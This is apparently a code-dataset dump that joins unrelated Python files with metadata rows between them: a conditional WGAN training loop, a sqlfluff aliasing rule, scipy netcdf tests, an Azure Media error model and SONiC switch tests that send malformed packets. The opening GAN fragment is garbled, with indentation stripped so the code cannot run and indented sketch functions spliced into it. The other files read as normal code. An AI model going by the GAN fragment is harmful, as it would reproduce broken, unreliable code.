# error_real = loss(prediction_real, ones_target(N))
# error_real.backward()
# 1.2 Train on Fake Data
# fake_data = fake_data.view(-1, 3, 64, 64)
prediction_fake = discriminator(fake_data, y)
# Calculate error and backpropagate
# error_fake = loss(prediction_fake, zeros_target(N))
# error_fake.backward()
D_loss = -(torch.mean(prediction_real) - torch.mean(prediction_fake))
D_loss.backward()
# 1.3 Update weights with gradients
optimizer.step()
# weight(gradient) clipping
# # torch.clamp_(discriminator.parameters(), min=-clip, max=clip)
# w = discriminator.weight.data
# w = w.clamp(-clip, clip)
# discriminator.weight.data = w
for p in discriminator.parameters():
p.data.clamp_(-clip, clip)
# Return error and predictions for real and fake inputs
# return error_real + error_fake, prediction_real, prediction_fake
return D_loss, prediction_real, prediction_fake
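# Minimal standalone sketch (illustration only, not called by the code above or
# below): it restates the critic objective computed in train_discriminator(),
# namely minimising -(E[D(real)] - E[D(fake)]) as in WGAN-style training.
def wgan_critic_loss(real_scores, fake_scores):
    return -(torch.mean(real_scores) - torch.mean(fake_scores))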
def train_generator(optimizer, fake_data, y):
N = fake_data.size(0)
# Reset gradients
optimizer.zero_grad()
# Sample noise and generate fake data
prediction = discriminator(fake_data, y)
# Calculate error and backpropagate
# error = loss(prediction, ones_target(N))
G_loss = -torch.mean(prediction)
G_loss.backward()
# Update weights with gradients
optimizer.step()
# Return error
return G_loss
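# Minimal standalone sketch (illustration only, not used by the training loop
# below) of the cGAN conditioning step applied later on: a one-hot label vector
# is concatenated to the noise before it is fed to the generator. The 10-class /
# 100-dim sizes mirror the values used elsewhere in this script.
def make_conditional_noise(batch_size, n_classes=10, noise_dim=100):
    z = torch.randn(batch_size, noise_dim, device=device)
    labels = torch.randint(n_classes, (batch_size,), device=device)
    one_hot = torch.zeros(batch_size, n_classes, device=device)
    one_hot[torch.arange(batch_size, device=device), labels] = 1
    return torch.cat((z, one_hot), 1), labels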
num_test_samples = 16
test_noise = noise(num_test_samples)
test_condition = torch.randint(10, (num_test_samples,)).to(device)
test_labels = torch.zeros(num_test_samples, 10).to(device)
test_labels[torch.arange(num_test_samples), test_condition] = 1
test_z_y = torch.cat((test_noise, test_labels), 1).to(device)
# Create logger instance
logger = Logger(model_name='cGAN', data_name='cifar')
# Total number of epochs to train
num_epochs = 2000
for epoch in range(num_epochs):
for n_batch, samples in enumerate(data_loader):
(real_batch, real_labels) = samples
real_batch = real_batch.to(device)
real_labels = real_labels.to(device)
N = real_batch.size(0)
# 0. change to one-hot encoding
one_hot = torch.zeros(N, 10).to(device)
one_hot[torch.arange(N).to(device), real_labels] = 1
# one_hot.to(device)
# 1. Train Discriminator
# real_data = images_to_vectors(real_batch)
# Generate fake data and detach (so gradients are not calculated for generator)
z = noise(N)
z_y = torch.cat((z, one_hot), 1).to(device)
y = one_hot
fake_data = generator(z_y).detach()
# Train D
d_error, d_pred_real, d_pred_fake = train_discriminator(d_optimizer, real_batch, fake_data, y)
# 2. Train Generator
# Generate fake data
fake_data = generator(z_y)
# Train G
g_error = train_generator(g_optimizer, fake_data, y)
# Log batch error
logger.log(d_error, g_error, epoch, n_batch, num_batches)
# Display Progress every few batches
if n_batch % 100 == 0:
# test_images = vectors_to_images(generator(test_z_y))
test_images = generator(test_z_y).data
logger.log_images(test_images.cpu(), num_test_samples, epoch, n_batch, num_batches)
# Display status Logs
logger.display_status(epoch, num_epochs, n_batch, num_batches, d_error, g_error, d_pred_real, d_pred_fake)
#
# # save model every 100 epoch
# if epoch % 10 == 0:
# torch.save(discriminator.state_dict(), D_PATH)
# torch.save(generator.state_dict(), G_PATH)
| 25.215743
| 109
| 0.700659
|
40635e8aa2700604895758adea4cc527eee337ac
| 794
|
py
|
Python
|
src/sqlfluff/rules/L012.py
|
markpolyak/sqlfluff
|
8d7ff6480d4807aabf208c99f65998870214fc51
|
[
"MIT"
] | 1
|
2021-12-29T21:56:44.000Z
|
2021-12-29T21:56:44.000Z
|
src/sqlfluff/rules/L012.py
|
markpolyak/sqlfluff
|
8d7ff6480d4807aabf208c99f65998870214fc51
|
[
"MIT"
] | 1
|
2021-09-15T18:20:39.000Z
|
2021-09-15T18:20:39.000Z
|
src/sqlfluff/rules/L012.py
|
markpolyak/sqlfluff
|
8d7ff6480d4807aabf208c99f65998870214fc51
|
[
"MIT"
] | null | null | null |
"""Implementation of Rule L012."""
from sqlfluff.rules.L011 import Rule_L011
class Rule_L012(Rule_L011):
"""Implicit/explicit aliasing of columns.
Aliasing of columns to follow preference
(explicit using an `AS` clause is default).
    NB: This rule inherits its functionality from :obj:`Rule_L011` but is
separate so that they can be enabled and disabled separately.
| **Anti-pattern**
| In this example, the alias for column 'a' is implicit.
.. code-block:: sql
SELECT
a alias_col
FROM foo
| **Best practice**
| Add `AS` to make it explicit.
.. code-block:: sql
SELECT
a AS alias_col
FROM foo
"""
config_keywords = ["aliasing"]
_target_elems = ("select_clause_element",)
| 20.894737
| 72
| 0.633501
|
095aee77fca61cd5b3f0814ab79811ff084e3d8b
| 170
|
py
|
Python
|
tests/model_control/detailed/transf_RelativeDifference/model_control_one_enabled_RelativeDifference_Lag1Trend_Seasonal_Hour_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
tests/model_control/detailed/transf_RelativeDifference/model_control_one_enabled_RelativeDifference_Lag1Trend_Seasonal_Hour_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | 1
|
2019-11-30T23:39:38.000Z
|
2019-12-01T04:34:35.000Z
|
tests/model_control/detailed/transf_RelativeDifference/model_control_one_enabled_RelativeDifference_Lag1Trend_Seasonal_Hour_MLP.py
|
jmabry/pyaf
|
afbc15a851a2445a7824bf255af612dc429265af
|
[
"BSD-3-Clause"
] | null | null | null |
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['RelativeDifference'] , ['Lag1Trend'] , ['Seasonal_Hour'] , ['MLP'] );
| 42.5
| 92
| 0.764706
|
ab56cfe6e5e3527c691beca6dac656c72e8b0342
| 2,303
|
py
|
Python
|
test/test.py
|
kovacsv/DebugToFile
|
3dfdbe82895624e22252bd4da38f24ccd2204918
|
[
"MIT"
] | null | null | null |
test/test.py
|
kovacsv/DebugToFile
|
3dfdbe82895624e22252bd4da38f24ccd2204918
|
[
"MIT"
] | null | null | null |
test/test.py
|
kovacsv/DebugToFile
|
3dfdbe82895624e22252bd4da38f24ccd2204918
|
[
"MIT"
] | null | null | null |
import os
import subprocess
def WriteTitle (title):
print '--- ' + title + ' ---'
def Error ():
raise Exception ('Test Failed')
def GetFileLines (fileName):
	file = open (fileName)
lines = file.readlines ()
file.close ()
return lines
def GetCommandOutput (command):
process = subprocess.Popen (command, stdout = subprocess.PIPE, stderr = subprocess.PIPE, shell = True)
out, err = process.communicate ()
return process.returncode, out, err
currentPath = os.path.dirname (os.path.abspath (__file__))
os.chdir (currentPath)
debugToFilePath = os.path.join ('..', 'solution', 'x64', 'Debug', 'DebugToFile.exe')
exampleProcessPath = os.path.join ('..', 'solution', 'x64', 'Debug', 'ExampleProcess.exe')
resultFilePath = 'test.txt'
WriteTitle ('Run process standalone')
ret, out, err = GetCommandOutput (exampleProcessPath)
print out
if ret != 1984:
Error ()
WriteTitle ('Run DebugToFile without parameters')
ret, out, err = GetCommandOutput (debugToFilePath)
print out
if ret != 1:
Error ()
if out != 'Usage: DebugToFile.exe [DebugLogFileName] [ApplicationName] <ApplicationArguments>\r\n':
Error ()
WriteTitle ('Run DebugToFile with invalid process')
ret, out, err = GetCommandOutput (debugToFilePath + ' NotExisting.exe ' + resultFilePath + ' NotExisting.exe')
print out
if ret != 1:
Error ()
if out != 'Error: Failed to start application\r\n':
Error ()
WriteTitle ('Run process with DebugToFile')
ret, out, err = GetCommandOutput (debugToFilePath + ' ' + resultFilePath + ' ' + exampleProcessPath)
print out
if ret != 1984:
Error ()
lines = GetFileLines (resultFilePath)
if lines[0] != exampleProcessPath + '\n':
Error ()
for i in range (1, len (lines)):
if lines[i] != str (i - 1) + '\n':
Error ()
os.remove (resultFilePath)
WriteTitle ('Run process with DebugToFile with parameters')
ret, out, err = GetCommandOutput (debugToFilePath + ' ' + resultFilePath + ' ' + exampleProcessPath + ' -a -b -c')
print out
if ret != 1984:
Error ()
lines = GetFileLines (resultFilePath)
if lines[0] != exampleProcessPath + '\n':
Error ()
if lines[1] != '-a\n':
Error ()
if lines[2] != '-b\n':
Error ()
if lines[3] != '-c\n':
Error ()
for i in range (4, len (lines)):
if lines[i] != str (i - 4) + '\n':
Error ()
os.remove (resultFilePath)
WriteTitle ('Result')
print 'OK'
| 27.094118
| 114
| 0.684325
|
9b66b87c6060fb35a82d4d9b0d62059ef3896513
| 4,740
|
py
|
Python
|
scipy/io/tests/test_netcdf.py
|
dlax/scipy
|
221cb8fa31c45d08ec6d9f946ebf9476bdc1fccd
|
[
"BSD-3-Clause"
] | 2
|
2015-10-30T10:04:46.000Z
|
2017-03-11T00:58:21.000Z
|
scipy/io/tests/test_netcdf.py
|
aidoom/scipy
|
112d9a25fe3b898eff862e4d4596409372a9b237
|
[
"BSD-3-Clause"
] | null | null | null |
scipy/io/tests/test_netcdf.py
|
aidoom/scipy
|
112d9a25fe3b898eff862e4d4596409372a9b237
|
[
"BSD-3-Clause"
] | null | null | null |
''' Tests for netcdf '''
import os
from os.path import join as pjoin, dirname
import shutil
import tempfile
import time
import sys
if sys.version_info[0] >= 3:
from io import BytesIO
else:
from StringIO import StringIO as BytesIO
from glob import glob
import numpy as np
from numpy.compat import asbytes
from scipy.io.netcdf import netcdf_file
from nose.tools import assert_true, assert_false, assert_equal, assert_raises
TEST_DATA_PATH = pjoin(dirname(__file__), 'data')
N_EG_ELS = 11 # number of elements for example variable
VARTYPE_EG = 'b' # var type for example variable
def make_simple(*args, **kwargs):
f = netcdf_file(*args, **kwargs)
f.history = 'Created for a test'
f.createDimension('time', N_EG_ELS)
time = f.createVariable('time', VARTYPE_EG, ('time',))
time[:] = np.arange(N_EG_ELS)
time.units = 'days since 2008-01-01'
f.flush()
return f
def gen_for_simple(ncfileobj):
''' Generator for example fileobj tests '''
yield assert_equal, ncfileobj.history, asbytes('Created for a test')
time = ncfileobj.variables['time']
yield assert_equal, time.units, asbytes('days since 2008-01-01')
yield assert_equal, time.shape, (N_EG_ELS,)
yield assert_equal, time[-1], N_EG_ELS-1
def test_read_write_files():
# test round trip for example file
cwd = os.getcwd()
try:
tmpdir = tempfile.mkdtemp()
os.chdir(tmpdir)
f = make_simple('simple.nc', 'w')
f.close()
# To read the NetCDF file we just created::
f = netcdf_file('simple.nc')
# Using mmap is the default
yield assert_true, f.use_mmap
for testargs in gen_for_simple(f):
yield testargs
f.close()
# Now without mmap
f = netcdf_file('simple.nc', mmap=False)
# Using mmap is the default
yield assert_false, f.use_mmap
for testargs in gen_for_simple(f):
yield testargs
f.close()
# To read the NetCDF file we just created, as file object, no
# mmap. When n * n_bytes(var_type) is not divisible by 4, this
# raised an error in pupynere 1.0.12 and scipy rev 5893, because
# calculated vsize was rounding up in units of 4 - see
# http://www.unidata.ucar.edu/software/netcdf/docs/netcdf.html
fobj = open('simple.nc', 'rb')
f = netcdf_file(fobj)
# by default, don't use mmap for file-like
yield assert_false, f.use_mmap
for testargs in gen_for_simple(f):
yield testargs
f.close()
except:
os.chdir(cwd)
shutil.rmtree(tmpdir)
raise
os.chdir(cwd)
shutil.rmtree(tmpdir)
def test_read_write_sio():
eg_sio1 = BytesIO()
f1 = make_simple(eg_sio1, 'w')
str_val = eg_sio1.getvalue()
f1.close()
eg_sio2 = BytesIO(str_val)
f2 = netcdf_file(eg_sio2)
for testargs in gen_for_simple(f2):
yield testargs
f2.close()
# Test that error is raised if attempting mmap for sio
eg_sio3 = BytesIO(str_val)
yield assert_raises, ValueError, netcdf_file, eg_sio3, 'r', True
# Test 64-bit offset write / read
eg_sio_64 = BytesIO()
f_64 = make_simple(eg_sio_64, 'w', version=2)
str_val = eg_sio_64.getvalue()
f_64.close()
eg_sio_64 = BytesIO(str_val)
f_64 = netcdf_file(eg_sio_64)
for testargs in gen_for_simple(f_64):
yield testargs
yield assert_equal, f_64.version_byte, 2
# also when version 2 explicitly specified
eg_sio_64 = BytesIO(str_val)
f_64 = netcdf_file(eg_sio_64, version=2)
for testargs in gen_for_simple(f_64):
yield testargs
yield assert_equal, f_64.version_byte, 2
def test_read_example_data():
# read any example data files
for fname in glob(pjoin(TEST_DATA_PATH, '*.nc')):
f = netcdf_file(fname, 'r')
f = netcdf_file(fname, 'r', mmap=False)
def test_itemset_no_segfault_on_readonly():
# Regression test for ticket #1202.
# Open the test file in read-only mode.
filename = pjoin(TEST_DATA_PATH, 'example_1.nc')
f = netcdf_file(filename, 'r')
time_var = f.variables['time']
# time_var.assignValue(42) should raise a RuntimeError--not seg. fault!
assert_raises(RuntimeError, time_var.assignValue, 42)
def test_write_invalid_dtype():
dtypes = ['int64', 'uint64']
if np.dtype('int').itemsize == 8: # 64-bit machines
dtypes.append('int')
if np.dtype('uint').itemsize == 8: # 64-bit machines
dtypes.append('uint')
f = netcdf_file(BytesIO(), 'w')
f.createDimension('time', N_EG_ELS)
for dt in dtypes:
yield assert_raises, ValueError, \
f.createVariable, 'time', dt, ('time',)
f.close()
| 31.6
| 77
| 0.655485
|
0fe3c628a8403ca80280ecb1963c6e7b148a7e96
| 2,583
|
py
|
Python
|
azure-mgmt-media/azure/mgmt/media/models/job_error_py3.py
|
NMijat1024/azure-sdk-for-python
|
c49e1d6d797dceaca81813cafb1a486d67185182
|
[
"MIT"
] | 1
|
2018-07-23T08:59:24.000Z
|
2018-07-23T08:59:24.000Z
|
azure-mgmt-media/azure/mgmt/media/models/job_error_py3.py
|
NMijat1024/azure-sdk-for-python
|
c49e1d6d797dceaca81813cafb1a486d67185182
|
[
"MIT"
] | 1
|
2018-11-29T14:46:42.000Z
|
2018-11-29T14:46:42.000Z
|
azure-mgmt-media/azure/mgmt/media/models/job_error_py3.py
|
NMijat1024/azure-sdk-for-python
|
c49e1d6d797dceaca81813cafb1a486d67185182
|
[
"MIT"
] | 1
|
2018-08-28T14:36:47.000Z
|
2018-08-28T14:36:47.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class JobError(Model):
"""Details of JobOutput errors.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar code: Error code describing the error. Possible values include:
'ServiceError', 'ServiceTransientError', 'DownloadNotAccessible',
'DownloadTransientError', 'UploadNotAccessible', 'UploadTransientError',
'ConfigurationUnsupported', 'ContentMalformed', 'ContentUnsupported'
:vartype code: str or ~azure.mgmt.media.models.JobErrorCode
:ivar message: A human-readable language-dependent representation of the
error.
:vartype message: str
:ivar category: Helps with categorization of errors. Possible values
include: 'Service', 'Download', 'Upload', 'Configuration', 'Content'
:vartype category: str or ~azure.mgmt.media.models.JobErrorCategory
:ivar retry: Indicates that it may be possible to retry the Job. If retry
is unsuccessful, please contact Azure support via Azure Portal. Possible
values include: 'DoNotRetry', 'MayRetry'
:vartype retry: str or ~azure.mgmt.media.models.JobRetry
:ivar details: An array of details about specific errors that led to this
reported error.
:vartype details: list[~azure.mgmt.media.models.JobErrorDetail]
"""
_validation = {
'code': {'readonly': True},
'message': {'readonly': True},
'category': {'readonly': True},
'retry': {'readonly': True},
'details': {'readonly': True},
}
_attribute_map = {
'code': {'key': 'code', 'type': 'JobErrorCode'},
'message': {'key': 'message', 'type': 'str'},
'category': {'key': 'category', 'type': 'JobErrorCategory'},
'retry': {'key': 'retry', 'type': 'JobRetry'},
'details': {'key': 'details', 'type': '[JobErrorDetail]'},
}
def __init__(self, **kwargs) -> None:
super(JobError, self).__init__(**kwargs)
self.code = None
self.message = None
self.category = None
self.retry = None
self.details = None
| 40.359375
| 77
| 0.629113
|
15dd16c91a20ba1abe6daab40e9abafcd6f86fb3
| 31,439
|
py
|
Python
|
tests/drop_packets/drop_packets.py
|
stephengao-ragilenetworks/sonic-mgmt
|
b7ce8f6592f12ee8a7a0daca9a4337d5eaf9313f
|
[
"Apache-2.0"
] | 1
|
2021-09-24T08:40:57.000Z
|
2021-09-24T08:40:57.000Z
|
tests/drop_packets/drop_packets.py
|
stephengao-ragilenetworks/sonic-mgmt
|
b7ce8f6592f12ee8a7a0daca9a4337d5eaf9313f
|
[
"Apache-2.0"
] | 4
|
2019-07-26T08:42:01.000Z
|
2020-12-16T08:34:52.000Z
|
tests/drop_packets/drop_packets.py
|
stephengao-ragilenetworks/sonic-mgmt
|
b7ce8f6592f12ee8a7a0daca9a4337d5eaf9313f
|
[
"Apache-2.0"
] | 1
|
2021-06-13T07:38:59.000Z
|
2021-06-13T07:38:59.000Z
|
import logging
import os
import importlib
import netaddr
import pytest
import random
import time
import ptf.testutils as testutils
import ptf.mask as mask
import ptf.packet as packet
from tests.common.helpers.assertions import pytest_assert, pytest_require
from tests.common.platform.device_utils import fanout_switch_port_lookup
from tests.common.helpers.constants import DEFAULT_NAMESPACE
from tests.common.utilities import get_inventory_files
RX_DRP = "RX_DRP"
RX_ERR = "RX_ERR"
L2_COL_KEY = RX_DRP
L3_COL_KEY = RX_ERR
pytest.SKIP_COUNTERS_FOR_MLNX = False
MELLANOX_MAC_UPDATE_SCRIPT = os.path.join(os.path.dirname(__file__), "fanout/mellanox/mlnx_update_mac.j2")
LOG_EXPECT_PORT_OPER_DOWN_RE = ".*Port {} oper state set from up to down.*"
LOG_EXPECT_PORT_OPER_UP_RE = ".*Port {} oper state set from down to up.*"
logger = logging.getLogger(__name__)
@pytest.fixture
def fanouthost(request, duthosts, rand_one_dut_hostname, localhost):
"""
    Fixture that allows updating the fanout configuration when there is a need to send incorrect packets.
    It adds the possibility to implement vendor-specific logic for handling the fanout configuration.
    If a vendor needs to update the fanout configuration, the 'fanouthost' fixture should load and return an appropriate handler instance.
    This instance can then be used inside a test case to handle the fanout configuration in a vendor-specific section.
    By default the 'fanouthost' fixture does not instantiate any handler and returns None; in that case the
    'fanouthost' instance should not be used in the test case logic.
"""
duthost = duthosts[rand_one_dut_hostname]
fanout = None
# Check that class to handle fanout config is implemented
if "mellanox" == duthost.facts["asic_type"]:
for file_name in os.listdir(os.path.join(os.path.dirname(__file__), "fanout")):
# Import fanout configuration handler based on vendor name
if "mellanox" in file_name:
module = importlib.import_module("..fanout.{0}.{0}_fanout".format(file_name.strip(".py")), __name__)
fanout = module.FanoutHandler(duthost, localhost, get_inventory_files(request))
if not fanout.is_mellanox:
fanout = None
break
yield fanout
if fanout is not None:
fanout.restore_config()
@pytest.fixture(scope="module")
def pkt_fields(duthosts, rand_one_dut_hostname, tbinfo):
duthost = duthosts[rand_one_dut_hostname]
# Gather ansible facts
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
ipv4_addr = None
ipv6_addr = None
for item in mg_facts["minigraph_bgp"]:
if item["name"] == mg_facts["minigraph_bgp"][0]["name"]:
if netaddr.valid_ipv4(item["addr"]):
ipv4_addr = item["addr"]
else:
ipv6_addr = item["addr"]
class Collector(dict):
def __getitem__(self, key):
value = super(Collector, self).__getitem__(key)
if key == "ipv4_dst" and value is None:
pytest.skip("IPv4 address is not defined")
elif key == "ipv6_dst" and value is None:
pytest.skip("IPv6 address is not defined")
return value
test_pkt_data = Collector({
"ipv4_dst": ipv4_addr,
"ipv4_src": "1.1.1.1",
"ipv6_dst": ipv6_addr,
"ipv6_src": "ffff::101:101",
"tcp_sport": 1234,
"tcp_dport": 4321
})
return test_pkt_data
def expected_packet_mask(pkt):
""" Return mask for sniffing packet """
exp_pkt = pkt.copy()
exp_pkt = mask.Mask(exp_pkt)
exp_pkt.set_do_not_care_scapy(packet.Ether, 'dst')
exp_pkt.set_do_not_care_scapy(packet.Ether, 'src')
exp_pkt.set_do_not_care_scapy(packet.IP, 'ttl')
exp_pkt.set_do_not_care_scapy(packet.IP, 'chksum')
return exp_pkt
@pytest.fixture(scope="module")
def setup(duthosts, rand_one_dut_hostname, tbinfo):
"""
Setup fixture for collecting PortChannel, VLAN and RIF port members.
@return: Dictionary with keys:
port_channel_members, vlan_members, rif_members, dut_to_ptf_port_map, neighbor_sniff_ports, vlans, mg_facts
"""
duthost = duthosts[rand_one_dut_hostname]
intf_per_namespace = {}
port_channel_members = {}
vlan_members = {}
configured_vlans = []
rif_members = []
if tbinfo["topo"]["type"] == "ptf":
pytest.skip("Unsupported topology {}".format(tbinfo["topo"]))
#Gather interface facts per asic
for ns in duthost.get_asic_namespace_list():
intf_per_namespace[ns if ns is not DEFAULT_NAMESPACE else ''] = duthost.interface_facts(namespace=ns)['ansible_facts']['ansible_interface_facts']
# Gather ansible facts
mg_facts = duthost.get_extended_minigraph_facts(tbinfo)
for port_channel, interfaces in mg_facts['minigraph_portchannels'].items():
for iface in interfaces["members"]:
port_channel_members[iface] = port_channel
for vlan_id in mg_facts["minigraph_vlans"]:
for iface in mg_facts["minigraph_vlans"][vlan_id]["members"]:
vlan_members[iface] = vlan_id
rif_members = {item["attachto"]: item["attachto"] for item in mg_facts["minigraph_interfaces"]}
# Compose list of sniff ports
neighbor_sniff_ports = []
for dut_port, neigh in mg_facts['minigraph_neighbors'].items():
neighbor_sniff_ports.append(mg_facts['minigraph_ptf_indices'][dut_port])
for vlan_name, vlans_data in mg_facts["minigraph_vlans"].items():
configured_vlans.append(int(vlans_data["vlanid"]))
setup_information = {
"port_channel_members": port_channel_members,
"vlan_members": vlan_members,
"rif_members": rif_members,
"dut_to_ptf_port_map": mg_facts["minigraph_ptf_indices"],
"neighbor_sniff_ports": neighbor_sniff_ports,
"vlans": configured_vlans,
"mg_facts": mg_facts,
"intf_per_namespace": intf_per_namespace
}
return setup_information
@pytest.fixture
def rif_port_down(duthosts, rand_one_dut_hostname, setup, fanouthosts, loganalyzer):
"""Shut RIF interface and return neighbor IP address attached to this interface."""
duthost = duthosts[rand_one_dut_hostname]
wait_after_ports_up = 30
if not setup["rif_members"]:
pytest.skip("RIF interface is absent")
rif_member_iface = setup["rif_members"].keys()[0]
vm_name = setup["mg_facts"]["minigraph_neighbors"][rif_member_iface].get("name", None)
pytest_assert(vm_name, 'Neighbor not found for RIF member "{}"'.format(rif_member_iface))
ip_dst = None
for item in setup["mg_facts"]["minigraph_bgp"]:
if item["name"] == vm_name and netaddr.valid_ipv4(item["addr"]):
ip_dst = item["addr"]
break
pytest_assert(ip_dst, 'Unable to find IP address for neighbor "{}"'.format(vm_name))
fanout_neighbor, fanout_intf = fanout_switch_port_lookup(fanouthosts, duthost.hostname, rif_member_iface)
loganalyzer[rand_one_dut_hostname].expect_regex = [LOG_EXPECT_PORT_OPER_DOWN_RE.format(rif_member_iface)]
with loganalyzer[rand_one_dut_hostname] as _:
fanout_neighbor.shutdown(fanout_intf)
time.sleep(1)
yield ip_dst
loganalyzer[rand_one_dut_hostname].expect_regex = [LOG_EXPECT_PORT_OPER_UP_RE.format(rif_member_iface)]
with loganalyzer[rand_one_dut_hostname] as _:
fanout_neighbor.no_shutdown(fanout_intf)
time.sleep(wait_after_ports_up)
@pytest.fixture(params=["port_channel_members", "vlan_members", "rif_members"])
def tx_dut_ports(request, setup):
""" Fixture for getting port members of specific port group """
return setup[request.param] if setup[request.param] else pytest.skip("No {} available".format(request.param))
@pytest.fixture
def ports_info(ptfadapter, duthosts, rand_one_dut_hostname, setup, tx_dut_ports):
"""
Return:
dut_iface - DUT interface name expected to receive packtes from PTF
asic_index - asic which owns the dut_iface, significant on a multi-asic platform.
ptf_tx_port_id - Port ID used by PTF for sending packets from expected PTF interface
dst_mac - DUT interface destination MAC address
src_mac - PTF interface source MAC address
"""
duthost = duthosts[rand_one_dut_hostname]
data = {}
data["dut_iface"] = random.choice(tx_dut_ports.keys())
# Check which asic owns this interface
for ns in duthost.get_asic_namespace_list():
if data["dut_iface"] in setup['intf_per_namespace'][ns if ns is not DEFAULT_NAMESPACE else '']:
break
# Get the asic index
asic_index = duthost.get_asic_id_from_namespace(ns)
data["asic_index"] = asic_index
data["ptf_tx_port_id"] = setup["dut_to_ptf_port_map"][data["dut_iface"]]
ns = ns if ns is not DEFAULT_NAMESPACE else ''
vlan = None
if data["dut_iface"] in setup["vlan_members"]:
vlan = setup["vlan_members"][data["dut_iface"]]
if vlan in setup['intf_per_namespace'][ns]:
data["dst_mac"] = setup['intf_per_namespace'][ns][vlan]['macaddress']
else:
data["dst_mac"] = setup['intf_per_namespace'][ns][data["dut_iface"]]['macaddress']
data["src_mac"] = ptfadapter.dataplane.ports[(0, data["ptf_tx_port_id"])].mac()
return data
def log_pkt_params(dut_iface, mac_dst, mac_src, ip_dst, ip_src):
""" Displays information about packet fields used in test case: mac_dst, mac_src, ip_dst, ip_src """
logger.info("Selected TX interface on DUT - {}".format(dut_iface))
logger.info("Packet DST MAC - {}".format(mac_dst))
logger.info("Packet SRC MAC - {}".format(mac_src))
logger.info("Packet IP DST - {}".format(ip_dst))
logger.info("Packet IP SRC - {}".format(ip_src))
def send_packets(pkt, ptfadapter, ptf_tx_port_id, num_packets=1):
# Clear packets buffer on PTF
ptfadapter.dataplane.flush()
time.sleep(1)
# Send packets
testutils.send(ptfadapter, ptf_tx_port_id, pkt, count=num_packets)
time.sleep(1)
def test_equal_smac_dmac_drop(do_test, ptfadapter, duthosts, rand_one_dut_hostname, setup, fanouthost, pkt_fields, ports_info):
"""
@summary: Create a packet with equal SMAC and DMAC.
"""
if not fanouthost:
pytest.skip("Test case requires explicit fanout support")
duthost = duthosts[rand_one_dut_hostname]
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["dst_mac"], pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
src_mac = ports_info["dst_mac"]
if "mellanox" == duthost.facts["asic_type"]:
pytest.SKIP_COUNTERS_FOR_MLNX = True
src_mac = "00:00:00:00:00:11"
# Prepare openflow rule
fanouthost.update_config(template_path=MELLANOX_MAC_UPDATE_SCRIPT, match_mac=src_mac, set_mac=ports_info["dst_mac"], eth_field="eth_src")
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=src_mac, # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
comparable_pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["dst_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
do_test("L2", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], comparable_pkt=comparable_pkt)
def test_multicast_smac_drop(do_test, ptfadapter, duthosts, rand_one_dut_hostname, setup, fanouthost, pkt_fields, ports_info):
"""
@summary: Create a packet with multicast SMAC.
"""
if not fanouthost:
pytest.skip("Test case requires explicit fanout support")
duthost = duthosts[rand_one_dut_hostname]
multicast_smac = "01:00:5e:00:01:02"
src_mac = multicast_smac
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], multicast_smac, pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
if "mellanox" == duthost.facts["asic_type"]:
pytest.SKIP_COUNTERS_FOR_MLNX = True
src_mac = "00:00:00:00:00:11"
# Prepare openflow rule
fanouthost.update_config(template_path=MELLANOX_MAC_UPDATE_SCRIPT, match_mac=src_mac, set_mac=multicast_smac, eth_field="eth_src")
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=src_mac,
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
comparable_pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=multicast_smac,
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"]
)
do_test("L2", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"], comparable_pkt=comparable_pkt)
def test_not_expected_vlan_tag_drop(do_test, ptfadapter, setup, pkt_fields, ports_info):
"""
    @summary: Create a VLAN-tagged packet whose VLAN ID does not match the ingress port VLAN ID.
"""
start_vlan_id = 2
log_pkt_params(ports_info["dut_iface"], ports_info["dst_mac"], ports_info["src_mac"], pkt_fields["ipv4_dst"], pkt_fields["ipv4_src"])
max_vlan_id = 1000
upper_bound = max(setup["vlans"]) if setup["vlans"] else max_vlan_id
for interim in range(start_vlan_id, upper_bound):
if interim not in setup["vlans"]:
vlan_id = interim
break
else:
pytest.fail("Unable to generate unique not yet existed VLAN ID. Already configured VLANs range {}-{}".format(start_vlan_id,
upper_bound))
pkt = testutils.simple_tcp_packet(
eth_dst=ports_info["dst_mac"], # DUT port
eth_src=ports_info["src_mac"], # PTF port
ip_src=pkt_fields["ipv4_src"], # PTF source
ip_dst=pkt_fields["ipv4_dst"], # VM source
tcp_sport=pkt_fields["tcp_sport"],
tcp_dport=pkt_fields["tcp_dport"],
dl_vlan_enable=True,
vlan_vid=vlan_id,
)
do_test("L2", pkt, ptfadapter, ports_info, setup["neighbor_sniff_ports"])
